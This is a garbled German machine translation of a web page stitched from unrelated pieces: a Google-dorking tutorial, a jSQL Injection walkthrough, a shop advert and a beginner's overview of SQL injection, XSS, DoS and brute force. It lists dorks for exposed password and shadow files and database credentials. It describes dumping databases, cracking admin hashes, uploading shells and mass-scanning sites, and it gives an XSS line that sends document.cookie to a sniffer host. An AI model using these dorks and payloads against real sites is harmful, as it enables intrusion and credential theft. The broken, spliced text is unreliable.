Wir haben also herausgefunden, dass jeder mit einer Kombination der oben genannten Operatoren und Schlüsselwörter die notwendigen Informationen sammeln und nach Schwachstellen suchen kann. Diese Techniken werden oft als Google Hacking bezeichnet.

Seitenverzeichnis

Mithilfe der site:-Anweisung können Sie alle Links anzeigen, die Google auf der Website gefunden hat. Normalerweise werden Seiten, die dynamisch durch Skripte erstellt werden, nicht mithilfe von Parametern indiziert. Daher verwenden einige Websites ISAPI-Filter, sodass Links nicht in der Form /article.asp?num=10&dst=5 vorliegen, sondern mit Schrägstrichen /article/abc/num/ 10/dst/5 . Dies geschieht, um sicherzustellen, dass die Website allgemein von Suchmaschinen indexiert wird.

Lass es uns versuchen:

Website: www.whitehouse.gov Whitehouse

Google geht davon aus, dass jede Seite einer Website das Wort Whitehouse enthält. Dies ist es, was wir verwenden, um alle Seiten zu erhalten.
Es gibt auch eine vereinfachte Version:

Website:whitehouse.gov

Und das Beste daran ist, dass die Genossen von whitehouse.gov nicht einmal wussten, dass wir uns die Struktur ihrer Website und sogar die zwischengespeicherten Seiten angesehen haben, die Google für sich selbst heruntergeladen hat. Damit lässt sich die Struktur von Seiten studieren und Inhalte vorerst unbemerkt betrachten.

Auflisten von Dateien in Verzeichnissen

WEB-Server können anstelle der üblichen Listen von Serververzeichnissen anzeigen HTML-Seiten. Dies geschieht normalerweise so, dass Benutzer auswählen und herunterladen bestimmte Dateien. In vielen Fällen haben Administratoren jedoch nicht die Absicht, den Inhalt eines Verzeichnisses anzuzeigen. Dies liegt an einer falschen oder fehlenden Serverkonfiguration Startseite im Verzeichnis. Dadurch hat der Hacker die Chance, im Verzeichnis etwas Interessantes zu finden und es für seine eigenen Zwecke zu nutzen. Um alle Seiten dieser Art zu finden, genügt es zu beachten, dass sie alle die Wörter: index of im Titel enthalten. Da der Wortindex jedoch nicht nur solche Seiten enthält, müssen wir die Abfrage verfeinern und die Schlüsselwörter auf der Seite selbst berücksichtigen, also Abfragen wie:

intitle:index.of übergeordnetes Verzeichnis
intitle:index.of Namensgröße

Da die meisten Verzeichniseinträge beabsichtigt sind, kann es beim ersten Mal schwierig sein, falsch platzierte Einträge zu finden. Aber zumindest können Sie anhand der Auflistungen die WEB-Server-Version ermitteln, wie unten beschrieben.

Abrufen der WEB-Server-Version.

Bevor Sie einen Hackerangriff starten, ist es immer hilfreich, die WEB-Server-Version zu kennen. Auch hier ist es dank Google möglich, diese Informationen abzurufen, ohne eine Verbindung zu einem Server herzustellen. Wenn Sie sich die Verzeichnisliste genau ansehen, können Sie erkennen, dass dort der Name des WEB-Servers und seine Version angezeigt werden.

Apache1.3.29 – ProXad-Server unter trf296.free.fr Port 80

Ein erfahrener Administrator kann diese Informationen ändern, in der Regel sind sie jedoch wahr. Um diese Informationen zu erhalten, reicht es daher aus, eine Anfrage zu senden:

intitle:index.of server.at

Um Informationen für einen bestimmten Server zu erhalten, verfeinern wir die Anfrage:

intitle:index.of server.at site:ibm.com

Oder umgekehrt, wir suchen nach Servern, die auf einer bestimmten Version des Servers laufen:

intitle:index.of Apache/2.0.40 Server unter

Mit dieser Technik kann ein Hacker ein Opfer finden. Wenn er beispielsweise einen Exploit für eine bestimmte Version des WEB-Servers hat, kann er diesen finden und den vorhandenen Exploit ausprobieren.

Sie können die Serverversion auch ermitteln, indem Sie sich die Seiten ansehen, die bei der Installation einer neuen Version des WEB-Servers standardmäßig installiert werden. Um beispielsweise die Apache 1.2.6-Testseite anzuzeigen, geben Sie einfach Folgendes ein

intitle:Test.Page.for.Apache es.hat funktioniert!

Darüber hinaus installieren und starten einige Betriebssysteme den WEB-Server sofort während der Installation. Einige Benutzer sind sich dessen jedoch nicht einmal bewusst. Wenn Sie feststellen, dass jemand die Standardseite nicht gelöscht hat, ist es natürlich logisch anzunehmen, dass der Computer überhaupt keiner Konfiguration unterzogen wurde und wahrscheinlich anfällig für Angriffe ist.

Versuchen Sie, nach IIS 5.0-Seiten zu suchen

allintitle:Willkommen bei Windows 2000 Internet Services

Bei IIS können Sie nicht nur die Version des Servers ermitteln, sondern auch Windows-Version und Servicepaket.

Eine andere Möglichkeit, die Version des WEB-Servers zu ermitteln, besteht darin, nach Handbüchern (Hilfeseiten) und Beispielen zu suchen, die standardmäßig auf der Site installiert werden können. Hacker haben zahlreiche Möglichkeiten gefunden, diese Komponenten zu nutzen, um sich privilegierten Zugriff auf die Website zu verschaffen. Deshalb müssen Sie diese Komponenten am Produktionsstandort ausbauen. Ganz zu schweigen davon, dass Sie durch das Vorhandensein dieser Komponenten Informationen über den Servertyp und seine Version erhalten können. Suchen wir zum Beispiel nach dem Apache-Handbuch:

inurl:manuelle Apache-Direktiven-Module

Mit Google wie ein CGI-Scanner.

Der CGI-Scanner oder WEB-Scanner ist ein Dienstprogramm zur Suche nach anfälligen Skripten und Programmen auf dem Server des Opfers. Diese Dienstprogramme müssen wissen, wonach sie suchen müssen. Dafür verfügen sie über eine ganze Liste anfälliger Dateien, zum Beispiel:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Wir können jede dieser Dateien mit Google finden, indem wir zusätzlich die Wörter index of oder inurl mit dem Dateinamen in der Suchleiste verwenden: Wir können Websites mit anfälligen Skripten finden, zum Beispiel:

allinurl:/random_banner/index.cgi

Mit zusätzlichen Kenntnissen könnte ein Hacker eine Skript-Schwachstelle ausnutzen und die Schwachstelle nutzen, um das Skript zu zwingen, jede auf dem Server gespeicherte Datei bereitzustellen. Zum Beispiel eine Passwortdatei.

So schützen Sie sich vor Hackerangriffen durch Google. 1. Laden Sie keine wichtigen Daten auf den WEB-Server hoch.

Selbst wenn Sie die Daten vorübergehend veröffentlicht haben, können Sie sie vergessen, sonst hat jemand Zeit, diese Daten zu finden und zu übernehmen, bevor Sie sie löschen. Tu es nicht. Es gibt viele andere Möglichkeiten, Daten zu übertragen, die sie vor Diebstahl schützen.

2. Überprüfen Sie Ihre Website.

Nutzen Sie die beschriebenen Methoden, um Ihre Website zu recherchieren. Überprüfen Sie Ihre Website regelmäßig auf neue Methoden, die auf der Website http://johnny.ihackstuff.com erscheinen. Denken Sie daran, dass Sie eine Sondergenehmigung von Google benötigen, wenn Sie Ihre Aktionen automatisieren möchten. Wenn Sie sorgfältig lesen http://www.google.com/terms_of_service.html, dann sehen Sie den Satz: Sie dürfen ohne vorherige ausdrückliche Genehmigung von Google keine automatisierten Abfragen jeglicher Art an das System von Google senden.

3. Möglicherweise ist es nicht erforderlich, dass Google Ihre Website oder Teile davon indiziert.

Mit Google können Sie einen Link zu Ihrer Website oder einen Teil davon aus der Datenbank entfernen sowie Seiten aus dem Cache entfernen. Darüber hinaus können Sie die Suche nach Bildern auf Ihrer Website verbieten und die Anzeige kurzer Seitenfragmente in Suchergebnissen verbieten. Alle Möglichkeiten zum Löschen einer Website sind auf der Seite beschrieben http://www.google.com/remove.html. Dazu müssen Sie bestätigen, dass Sie wirklich der Eigentümer dieser Website sind oder Tags auf der Seite einfügen bzw

4. Verwenden Sie robots.txt

Es ist bekannt, dass Suchmaschinen die robots.txt-Datei im Stammverzeichnis der Website durchsuchen und die Teile, die mit dem Wort „Disallow“ gekennzeichnet sind, nicht indizieren. Damit können Sie verhindern, dass ein Teil der Website indexiert wird. Um beispielsweise die Indizierung der gesamten Website zu vermeiden, erstellen Sie eine robots.txt-Datei mit zwei Zeilen:

User-Agent: *
nicht zulassen: /

Was sonst noch passiert

Damit Ihnen das Leben nicht wie Honig vorkommt, sage ich am Ende, dass es Seiten gibt, die jenen Leuten folgen, die mit den oben genannten Methoden nach Lücken in Skripten suchen und WEB-Server. Ein Beispiel für eine solche Seite ist

Anwendung.

Ein bisschen süß. Probieren Sie selbst eines der folgenden aus:

1. #mysql dump filetype:sql – Suche nach Datenbank-Dumps mySQL-Daten
2. Zusammenfassungsbericht über Host-Schwachstellen – zeigt Ihnen, welche Schwachstellen andere Personen gefunden haben
3. phpMyAdmin läuft auf inurl:main.php – dadurch wird das Schließen der Steuerung über das phpmyadmin-Panel erzwungen
4. Nicht zur Weitergabe vertraulich
5. Fordern Sie Details zu den Variablen des Steuerbaumservers an
6. Laufen im Kindermodus
7. Dieser Bericht wurde von WebLog erstellt
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – vielleicht braucht jemand Firewall-Konfigurationsdateien? :) :)
10. intitle:index.of Finances.xls - hmm ....
11. intitle:Index der dbconvert.exe-Chats – ICQ-Chat-Protokolle
12. intext:Tobias Oetiker Verkehrsanalyse
13. intitle:Nutzungsstatistik für generiert durch Webalizer
14. intitle:Statistik der erweiterten Webstatistik
15. intitle:index.of ws_ftp.ini – WS-FTP-Konfiguration
16. inurl:ipsec.secrets enthält gemeinsame Geheimnisse – geheimer Schlüssel – guter Fund
17. inurl:main.php Willkommen bei phpMyAdmin
18. inurl:server-info Apache-Serverinformationen
19. Site:edu-Administratornoten
20. ORA-00921: Unerwartetes Ende des SQL-Befehls – Pfade abrufen
21. intitle:index.of trillian.ini
22. intitle:Index von pwd.db
23. intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle:Index von .mysql_history
27. intitle:index von intext:globals.inc
28. intitle:index.ofadministratoren.pwd
29. intitle:Index.of etc Shadow
30. intitle:index.of secring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:Dateityp ausführen:ini

  • „Hacking mit Google“
  • Schulungszentrum „Informzaschita“ http://www.itsecurity.ru – ein führendes Spezialzentrum im Bildungsbereich Informationssicherheit(Lizenz des Moskauer Bildungskomitees Nr. 015470, staatliche Akkreditierung Nr. 004251). Das einzige autorisierte Schulungszentrum für Internet Security Systems und Clearswift in Russland und den GUS-Staaten. Von Microsoft autorisiertes Schulungszentrum (Spezialisierung auf Sicherheit). Die Schulungsprogramme werden mit der Staatlichen Technischen Kommission Russlands, FSB (FAPSI), koordiniert. Ausbildungsbescheinigungen und staatliche Unterlagen zur Fortbildung.

    SoftKey ist einzigartiger Service für Käufer, Entwickler, Händler und Affiliate-Partner. Darüber hinaus ist dies einer der besten Online-Softwareshops in Russland, der Ukraine und Kasachstan, der seinen Kunden ein breites Sortiment, viele Zahlungsmethoden, schnelle (oft sofortige) Auftragsabwicklung, Verfolgung des Bestellabwicklungsprozesses im persönlichen Bereich und verschiedene Rabatte bietet aus dem Laden und Hersteller BY.

    Führen Sie die heruntergeladene Datei aus Doppelklick(Haben müssen virtuelle Maschine ).

    3. Anonymität beim Überprüfen der Site auf SQL-Injections
    Einrichten von Tor und Privoxy in Kali Linux

    [Abschnitt in Entwicklung]

    Einrichten von Tor und Privoxy unter Windows

    [Abschnitt in Entwicklung]

    jSQL-Injection-Proxy-Einstellungen

    [Abschnitt in Entwicklung]

    4. Überprüfen Sie die Site auf SQL-Injection mit jSQL-Injection

    Die Arbeit mit dem Programm ist äußerst einfach. Geben Sie einfach die Site-Adresse ein und drücken Sie ENTER.

    Der folgende Screenshot zeigt, dass die Site für drei Arten von SQL-Injections gleichzeitig anfällig ist (Informationen dazu werden in der unteren rechten Ecke angezeigt). Durch Klicken auf die Namen der Injektionen können Sie die verwendete Methode wechseln:

    Außerdem haben wir bereits die vorhandenen Datenbanken angezeigt.

    Sie können den Inhalt jeder Tabelle sehen:

    Normalerweise sind die Ader interessanteste Teil der Tabellen.

    Wenn Sie Glück haben und die Daten des Administrators gefunden haben, ist es noch zu früh, sich zu freuen. Sie müssen auch das Admin-Panel finden, wo Sie diese Daten eingeben können.

    5. Suchen Sie mit jSQL-Injection nach Administratoren

    Gehen Sie dazu auf die nächste Registerkarte. Hier erwartet uns eine Liste möglicher Adressen. Sie können eine oder mehrere Seiten zur Überprüfung auswählen:

    Der Vorteil besteht darin, dass Sie keine anderen Programme verwenden müssen.

    Leider gibt es nicht sehr viele unvorsichtige Programmierer, die Passwörter im Klartext speichern. Sehr oft sehen wir in der Passwortzeichenfolge so etwas wie

    8743b52063cd84097a65d1633f5c74f5

    Das ist ein Hash. Sie können es mit roher Gewalt entschlüsseln. Und… jSQL-Injection verfügt über einen integrierten Brute-Forcer.

    6. Brute-Force-Hashes mit jSQL-Injection

    Der unbestrittene Komfort besteht darin, dass Sie nicht nach anderen Programmen suchen müssen. Es unterstützt viele der beliebtesten Hashes.

    Dies ist nicht die beste Option. Um ein Guru im Entschlüsseln von Hashes zu werden, empfiehlt sich das Buch „“ auf Russisch.

    Aber wenn kein anderes Programm zur Hand ist oder keine Zeit zum Lernen bleibt, ist jSQL Injection mit integrierter Brute-Force-Funktion natürlich praktisch.

    Es gibt Einstellungen: Sie können festlegen, welche Zeichen im Passwort enthalten sind, sowie den Passwortlängenbereich.

    7. Dateioperationen nach der SQL-Injection-Erkennung

    Zusätzlich zu Operationen mit Datenbanken – Lesen und Ändern – können bei Erkennung von SQL-Injections die folgenden Dateioperationen ausgeführt werden:

    • Lesen von Dateien auf dem Server
    • Hochladen neuer Dateien auf den Server
    • Hochladen von Shells auf den Server

    Und das alles ist in jSQL Injection implementiert!

    Es gibt Einschränkungen – der SQL-Server muss über Dateiberechtigungen verfügen. Vernünftig Systemadministratoren Sie sind behindert und haben keinen Zugriff darauf Dateisystem nicht erhältlich.

    Das Vorhandensein von Dateiberechtigungen lässt sich leicht überprüfen. Gehen Sie zu einer der Registerkarten (Dateien lesen, Shell erstellen, neue Datei hochladen) und versuchen Sie, einen der angegebenen Vorgänge auszuführen.

    Ein weiterer sehr wichtiger Hinweis: Wir müssen den genauen absoluten Pfad zu der Datei kennen, mit der wir arbeiten werden, sonst funktioniert nichts.

    Schauen Sie sich den folgenden Screenshot an:

    Jeder Versuch, eine Datei zu bearbeiten, wird mit „Kein FILE-Privileg“ (keine Dateiprivilegien) beantwortet. Und hier kann man nichts machen.

    Wenn stattdessen ein anderer Fehler auftritt:

    Problem beim Schreiben in [Verzeichnisname]

    Das bedeutet, dass Sie den absoluten Pfad, in den Sie die Datei schreiben möchten, falsch angegeben haben.

    Um einen absoluten Weg anzunehmen, muss man es zumindest wissen Betriebssystem auf dem der Server läuft. Wechseln Sie dazu auf die Registerkarte Netzwerk.

    Ein solcher Eintrag (Zeichenfolge Win64 ) gibt Anlass zu der Annahme, dass es sich um ein Windows-Betriebssystem handelt:

    Keep-Alive: Timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Verbindung: Keep-Alive-Methode: HTTP/1.1 200 OK Inhaltslänge: 353 Datum: Fr, 11. Dezember 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; Zeichensatz=UTF-8

    Hier haben wir etwas Unix (*BSD, Linux):

    Übertragungskodierung: chunked Datum: Fr, 11. Dezember 2015 11:57:02 GMT Methode: HTTP/1.1 200 OK Keep-Alive: Timeout=3, max=100 Verbindung: Keep-Alive Inhaltstyp: Text/HTML X- Unterstützt von: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

    Und hier haben wir CentOS:

    Methode: HTTP/1.1 200 OK Läuft ab: Do, 19. November 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Verbindung: keep-alive X-Cache-Lookup: MISS von t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS von t1.hoster.ru Cache-Kontrolle: No-Store, No-Cache, Must-Revalidate, Post-Check=0, Pre-Check=0 Pragma: No-Cache Datum: Fr, 11. Dezember 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

    Unter Windows ist ein typischer Site-Ordner C:\Server\data\htdocs\ . Wenn aber tatsächlich jemand daran „gedacht“ hat, einen Server unter Windows zu erstellen, dann hat diese Person höchstwahrscheinlich noch nichts von Privilegien gehört. Daher sollten Sie den Versuch direkt aus dem Verzeichnis C:/Windows/ starten:

    Wie Sie sehen, hat beim ersten Mal alles perfekt geklappt.

    Aber die jSQL-Injection-Shells selbst lassen meine Zweifel aufkommen. Wenn Sie über Dateirechte verfügen, können Sie durchaus etwas über eine Weboberfläche hochladen.

    8. Massenüberprüfung von Websites auf SQL-Injections

    Und sogar jSQL Injection verfügt über diese Funktion. Alles ist ganz einfach: Laden Sie eine Liste von Websites hoch (kann aus einer Datei importiert werden), wählen Sie diejenigen aus, die Sie überprüfen möchten, und klicken Sie auf die entsprechende Schaltfläche, um den Vorgang zu starten.

    Ausgabe durch jSQL-Injection

    jSQL-Injection ist ein gutes, leistungsstarkes Tool zum Suchen und anschließenden Verwenden von SQL-Injections auf Websites. Seine unbestrittenen Vorteile: Benutzerfreundlichkeit, integrierte verwandte Funktionen. jSQL-Injection kann der beste Freund eines Anfängers bei der Analyse von Websites sein.

    Von den Mängeln möchte ich die Unmöglichkeit erwähnen, Datenbanken zu bearbeiten (zumindest habe ich diese Funktionalität nicht gefunden). Wie bei allen Tools mit grafischer Oberfläche ist die fehlende Möglichkeit zur Verwendung in Skripten auf die Nachteile dieses Programms zurückzuführen. Dennoch ist auch in diesem Programm eine gewisse Automatisierung möglich – dank der integrierten Massen-Site-Check-Funktion.

    jSQL-Injection ist viel bequemer zu verwenden als sqlmap. Aber sqlmap unterstützt mehr Arten von SQL-Injection, verfügt über Datei-Firewall-Optionen und einige andere Funktionen.

    Fazit: jSQL Injection ist der beste Freund eines Hacker-Anfängers.

    Hilfe zu diesem Programm finden Sie in der Kali Linux Encyclopedia auf dieser Seite: http://kali.tools/?p=706

    Ich beschloss, ein wenig über Informationssicherheit zu sprechen. Der Artikel wird sowohl für unerfahrene Programmierer als auch für diejenigen nützlich sein, die gerade mit der Frontend-Entwicklung begonnen haben. Was ist das Problem?

    Viele unerfahrene Entwickler sind so süchtig danach, Code zu schreiben, dass sie die Sicherheit ihrer Arbeit völlig vergessen. Und was am wichtigsten ist: Sie vergessen Schwachstellen wie SQL-Abfragen und XXS. Sie erfinden auch einfache Passwörter für ihre Verwaltungsbereiche und werden brutaler Gewalt ausgesetzt. Was sind diese Angriffe und wie können sie vermieden werden?

    SQL-Injektion

    SQL-Injection ist die häufigste Art von Datenbankangriff, der mit einer SQL-Abfrage für ein bestimmtes DBMS durchgeführt wird. Viele Menschen und sogar große Unternehmen leiden unter solchen Angriffen. Der Grund ist ein Fehler eines Entwicklers beim Schreiben einer Datenbank und tatsächlich bei SQL-Abfragen.

    Ein Angriff vom Typ SQL-Injection ist aufgrund einer fehlerhaften Verarbeitung der in SQL-Abfragen verwendeten Eingabedaten möglich. Bei einem erfolgreichen Hackerangriff laufen Sie Gefahr, nicht nur den Inhalt der Datenbanken, sondern auch die Passwörter bzw. Protokolle des Administrationsbereichs zu verlieren. Und diese Daten werden völlig ausreichen, um die Site vollständig zu übernehmen oder irreversible Anpassungen daran vorzunehmen.

    Der Angriff kann erfolgreich in Skripten reproduziert werden, die in PHP, ASP, Perl und anderen Sprachen geschrieben sind. Der Erfolg solcher Angriffe hängt vielmehr davon ab, welches DBMS verwendet wird und wie das Szenario selbst umgesetzt wird. Es gibt weltweit viele anfällige Websites für SQL-Injections. Dies ist leicht zu überprüfen. Es reicht aus, „Dorks“ einzugeben – das sind spezielle Anfragen zum Auffinden gefährdeter Websites. Hier sind einige davon:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Wie benutzt man sie? Es reicht aus, sie in die Suchmaschine Google oder Yandex einzugeben. Die Suchmaschine zeigt Ihnen nicht nur eine anfällige Website, sondern auch eine Seite für diese Schwachstelle an. Aber wir werden hier nicht aufhören und sicherstellen, dass die Seite wirklich angreifbar ist. Hierzu genügt es, nach dem Wert „id=1“ ein einfaches Anführungszeichen „‘“ zu setzen. Irgendwie so:

    • inurl:games.php?id=1'

    Und die Site gibt uns eine Fehlermeldung bezüglich der SQL-Abfrage. Was braucht unser Hacker als nächstes?

    Und dann braucht er genau diesen Link zu der Seite mit einem Fehler. Anschließend erfolgt die Arbeit an der Schwachstelle in den meisten Fällen in der Distribution „Kali Linux“ mit ihren Dienstprogrammen für diesen Teil: die Einführung des Injektionscodes und die Durchführung der notwendigen Vorgänge. Wie das passieren wird, kann ich Ihnen nicht sagen. Aber Informationen hierzu finden Sie im Internet.

    XSS-Angriff

    Diese Art von Angriff wird ausgeführt Kekse. Sie wiederum sind sehr daran interessiert, Benutzer zu retten. Warum nicht? Wie ohne sie? Schließlich fahren wir dank Cookies nicht hundertmal ein Passwort von Vk.com oder Mail.ru ein. Und es gibt nur wenige, die sie ablehnen. Doch im Internet gilt für Hacker oft eine Regel: Der Bequemlichkeitskoeffizient ist direkt proportional zum Unsicherheitskoeffizienten.

    Um einen XSS-Angriff durchzuführen, benötigt unser Hacker JavaScript-Kenntnisse. Auf den ersten Blick ist die Sprache sehr einfach und harmlos, da sie keinen Zugriff auf Computerressourcen hat. Ein Hacker kann mit JavaScript nur in einem Browser arbeiten, aber das reicht. Schließlich geht es vor allem darum, den Code in die Webseite einzugeben.

    Ich werde nicht näher auf den Angriffsprozess eingehen. Ich werde nur die Grundlagen und die Bedeutung dessen erläutern, wie dies geschieht.

    Ein Hacker kann JS-Code zu einem Forum oder Gästebuch hinzufügen:

    document.location.href="http://192.168.1.7/sniff.php?test"

    Skripte leiten uns auf eine infizierte Seite weiter, auf der der Code ausgeführt wird: sei es ein Sniffer, eine Art Speicher oder ein Exploit, der unsere Cookies irgendwie aus dem Cache stiehlt.

    Warum JavaScript? Denn JavaScript eignet sich hervorragend für Webanfragen und hat Zugriff auf Cookies. Wenn unser Skript uns jedoch auf eine Website weiterleitet, wird der Benutzer dies leicht bemerken. Hier nutzt der Hacker eine raffiniertere Möglichkeit: Er gibt einfach den Code in das Bild ein.

    Img=newImage();

    Img.src=“ http://192.168.1.7/sniff.php?“+document.cookie;

    Wir erstellen einfach ein Bild und weisen diesem unser Skript als Adresse zu.

    Wie kann man sich vor all dem schützen? Ganz einfach: Folgen Sie keinen verdächtigen Links.

    DoS- und DDoS-Angriffe

    DoS (vom englischen Denial of Service). - Denial of Service) Hackerangriff auf einem Computersystem, um es zum Scheitern zu bringen. Hierdurch werden Bedingungen geschaffen, unter denen gewissenhafte Benutzer des Systems nicht auf die bereitgestellten Inhalte zugreifen können Systemressourcen(Server) oder dieser Zugriff ist schwierig. Der Ausfall des Systems kann auch ein Schritt zu seiner Erfassung sein, wenn die Software im Notfall kritische Informationen preisgibt: zum Beispiel die Version, einen Teil des Programmcodes usw. Meistens handelt es sich jedoch um ein Maß dafür wirtschaftlicher Druck: der Verlust einer einfachen Dienstleistung, die Einkommen generiert. Rechnungen des Anbieters oder Maßnahmen zur Abwehr des Angriffs treffen das „Ziel“ in der Tasche deutlich. Derzeit sind DoS- und DDoS-Angriffe am beliebtesten, da Sie damit nahezu jedes System zum Scheitern bringen können, ohne rechtlich bedeutsame Beweise zu hinterlassen.

    Was ist der Unterschied zwischen DoS- und DDoS-Angriffen?

    DoS ist ein intelligent aufgebauter Angriff. Wenn der Server beispielsweise die Richtigkeit eingehender Pakete nicht überprüft, kann ein Hacker eine solche Anfrage stellen, die für immer verarbeitet wird und nicht genügend Prozessorzeit für die Arbeit mit anderen Verbindungen vorhanden ist. Dementsprechend erhalten Kunden einen Denial-of-Service. Es wird jedoch nicht funktionieren, große bekannte Websites auf diese Weise zu überlasten oder zu deaktivieren. Sie sind mit ziemlich breiten Kanälen und superstarken Servern ausgestattet, die eine solche Überlastung problemlos bewältigen können.

    DDoS ist eigentlich der gleiche Angriff wie DoS. Aber wenn es bei DoS ein einziges Anforderungspaket gibt, dann kann es bei DDoS durchaus Hunderte oder mehr davon geben. Selbst Hochleistungsserver sind einer solchen Überlastung möglicherweise nicht gewachsen. Ich gebe Ihnen ein Beispiel.

    Ein DoS-Angriff liegt vor, wenn Sie gerade ein Gespräch mit jemandem führen, aber dann eine ungezogene Person auf Sie zukommt und laut zu schreien beginnt. Sprechen ist entweder unmöglich oder sehr schwierig. Lösung: Rufen Sie den Sicherheitsdienst, der die Person beruhigt und aus dem Raum führt. Bei DDoS-Angriffen treffen Tausende solcher ungezogenen Menschen aufeinander. In diesem Fall werden die Wachen nicht in der Lage sein, alle zu verdrehen und mitzunehmen.

    DoS und DDoS werden von Computern, den sogenannten Zombies, erzeugt. Hierbei handelt es sich um Computer von Benutzern, die von Hackern gehackt wurden, die nicht einmal ahnen, dass ihr Computer an dem Angriff auf einen Server beteiligt ist.

    Wie kann man sich davor schützen? Im Allgemeinen auf keinen Fall. Aber Sie können die Aufgabe eines Hackers erschweren. Dazu müssen Sie ein gutes Hosting mit leistungsstarken Servern auswählen.

    Brute-Force-Angriff

    Ein Entwickler kann viele Angriffsschutzsysteme entwickeln, die von uns geschriebenen Skripte vollständig überprüfen, die Website auf Schwachstellen überprüfen usw. Aber wenn es um den letzten Schritt des Site-Layouts geht, nämlich wenn nur noch ein Passwort in das Admin-Panel eingefügt wird, kann er eines vergessen. Passwort!

    Es wird dringend davon abgeraten, ein einfaches Passwort festzulegen. Es kann 12345, 1114457, vasya111 usw. sein. Es wird nicht empfohlen, Passwörter mit einer Länge von weniger als 10–11 Zeichen festzulegen. Andernfalls sind Sie möglicherweise dem häufigsten und nicht komplexesten Angriff ausgesetzt – Brute Force.

    Brute Force ist ein wörterbuchbasierter Passwort-Brute-Force-Angriff mit speziellen Programmen. Wörterbücher können unterschiedlich sein: Latein, nach Zahlen sortiert, sagen wir bis zu einem bestimmten Bereich, gemischt (Latein + Zahlen), und es gibt sogar Wörterbücher mit eindeutigen Symbolen @#4$%&*~~`'“\ ? usw.

    Natürlich lässt sich diese Art von Angriff leicht vermeiden. Es reicht aus, sich ein komplexes Passwort auszudenken. Sogar Captcha kann Sie retten. Und wenn Ihre Website auf einem CMS erstellt wurde, berechnen viele von ihnen einen ähnlichen Angriffstyp und blockieren die IP. Wir müssen immer bedenken, dass es umso schwieriger ist, das Passwort zu erlernen, je mehr unterschiedliche Zeichen es enthält.

    Wie arbeiten Hacker? In den meisten Fällen vermuten sie entweder einen Teil des Passworts oder kennen ihn bereits. Es ist durchaus logisch anzunehmen, dass das Passwort des Benutzers mit Sicherheit nicht aus 3 oder 5 Zeichen besteht. Solche Passwörter führen häufig zu Hacks. Grundsätzlich nehmen Hacker einen Bereich von 5 bis 10 Zeichen und fügen dort ein paar Zeichen hinzu, die sie wahrscheinlich im Voraus kennen. Als nächstes generieren Sie Passwörter mit den gewünschten Bereichen. Die Kali-Linux-Distribution bietet sogar Programme für solche Fälle an. Und voilà, der Angriff wird nicht mehr lange anhalten, da das Wörterbuchvolumen nicht mehr so ​​groß ist. Darüber hinaus kann ein Hacker die Leistung der Grafikkarte nutzen. Einige von ihnen unterstützen das CUDA-System, während die Aufzählungsgeschwindigkeit um das Zehnfache erhöht wird. Und jetzt sehen wir, dass der Angriff erfolgt auf einfache Weise ganz real. Aber nicht nur Websites sind brutaler Gewalt ausgesetzt.

    Liebe Entwickler, vergessen Sie niemals das Informationssicherheitssystem, denn heutzutage leiden viele Menschen, darunter auch Staaten, unter solchen Angriffen. Denn die größte Verletzlichkeit ist ein Mensch, der sich immer irgendwo ablenken lässt oder etwas übersieht. Wir sind Programmierer, aber keine programmierten Maschinen. Seien Sie immer auf der Hut, denn der Verlust von Informationen droht mit schwerwiegenden Folgen!